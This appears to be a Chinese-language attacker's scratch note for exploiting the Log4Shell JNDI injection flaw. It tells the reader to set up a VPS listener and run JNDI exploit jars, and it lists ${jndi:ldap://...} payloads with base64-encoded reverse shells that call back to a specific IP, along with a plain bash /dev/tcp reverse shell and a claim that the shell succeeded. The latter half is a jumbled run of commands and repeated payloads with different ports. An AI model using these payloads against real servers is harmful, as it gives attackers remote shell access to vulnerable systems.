1、买VPS,打开mobax进行ssh连接,开两个终端
一个终端开启监听
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 116.62.152.84
生成payload
构造payload
${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx}
输入进去之后看结果
反弹shell成功
结束
bash -i >& /dev/tcp/116.62.152.84/2220>&1 java -jarJNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzIyMzIgMD4mMQ==}|{base64,-d}|{bash,-i}"-A 116.62.152.84YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDI0IDA+JjE=50024
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDI0IDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDIwIDA+JjE=
50020
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDIwIDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.8450019
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDE5IDA+JjE=java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDE5IDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84ldap://172.31.135.21:1389/dddxhjc=${jndi:ldap://172.31.135.21:1389/dddxhj}c=${jndi:ldap://172.31.135.21:1389/yqffbb}c=${jndi:ldap://172.31.135.21:1389/f54nch}payload${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC80NCAwPiYx}${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx}c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx
)
)
)
)